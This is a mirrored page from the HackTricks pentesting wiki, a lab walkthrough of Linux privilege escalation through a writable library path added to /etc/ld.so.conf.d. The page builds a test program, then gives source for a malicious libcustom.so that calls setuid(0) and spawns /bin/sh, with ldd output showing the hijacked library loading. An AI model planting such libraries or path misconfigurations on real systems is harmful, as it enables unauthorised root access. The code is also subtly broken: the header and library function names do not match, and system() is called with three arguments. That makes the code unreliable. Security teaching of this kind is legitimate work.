Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 09:27:32 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/linux-unix/privilege-escalation/ld.so.conf-example.md
CPol f1023f74c6
GitBook: [master] 2 pages modified
2020-08-27 13:29:43 +00:00

3 KiB
Raw Blame History

ld.so.conf example

Prepare the environment

In the following section you can find the code of the files we are going to use to prepare the environment

{% tabs %} {% tab title="sharedvuln.c" %}

#include <stdio.h>
#include "libcustom.h"

int main(){
    printf("Welcome to my amazing application!\n");
    vuln_func();
    return 0;
}

{% endtab %}

{% tab title="libcustom.h" %}

#include <stdio.h>

void vuln_func();

{% endtab %}

{% tab title="libcustom.c" %}

#include <stdio.h>

void say_hi()
{
    puts("Hi");
}

{% endtab %} {% endtabs %}

  1. Create those files in your machine in the same folder
  2. Compile the library: gcc -shared -o libcustom.so -fPIC libcustom.c
  3. Copy ****libcustom.so to /usr/lib: sudo cp libcustom.so /usr/lib root privs
  4. Compile the executable: gcc sharedvuln.c -o sharedvuln -lcustom

Check the environment

Check that libcustom.so is being loaded from /usr/lib and that you can execute the binary.

$ ldd sharedvuln
	linux-vdso.so.1 =>  (0x00007ffc9a1f7000)
	libcustom.so => /usr/lib/libcustom.so (0x00007fb27ff4d000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb27fb83000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fb28014f000)
	
$ ./sharedvuln 
Welcome to my amazing application!
Hi

Exploit

In this scenario we are going to suppose that someone has created a vulnerable entry inside a file in /etc/ld.so.conf/:

sudo echo "/home/ubuntu/lib" > /etc/ld.so.conf.d/privesc.conf

The vulnerable folder is /home/ubuntu/lib where we have writable access.
Downloadand compile the following code inside that path:

//gcc -shared -o libcustom.so -fPIC libcustom.c

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

void say_hi(){
    setuid(0);
    setgid(0);
    printf("I'm the bad library\n");
    system("/bin/sh",NULL,NULL);
}

Now that we have created the malicious libcustom library inside the misconfigured path, we need to wait for a reboot or for the root user to execute ldconfig _in case you can execute this binary as **sudo** or it has the **suid bit** you will be able to execute it yourself_.

Once this has happened recheck where is the sharevuln executable loading the libcustom.so library from:

$ldd sharedvuln
	linux-vdso.so.1 =>  (0x00007ffeee766000)
	libcustom.so => /home/ubuntu/lib/libcustom.so (0x00007f3f27c1a000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f3f27850000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f3f27e1c000)

As you can see it's loading it from /home/ubuntu/lib and if any user executes it, a shell will be executed:

$ ./sharedvuln 
Welcome to my amazing application!
I'm the bad library
$ whoami
ubuntu

{% hint style="info" %} Note that in this example we haven't escalated privileges, but modifying the commands executed and waiting for root or other privileged user to execute the vulnerable binary we will be able to escalate privileges. {% endhint %}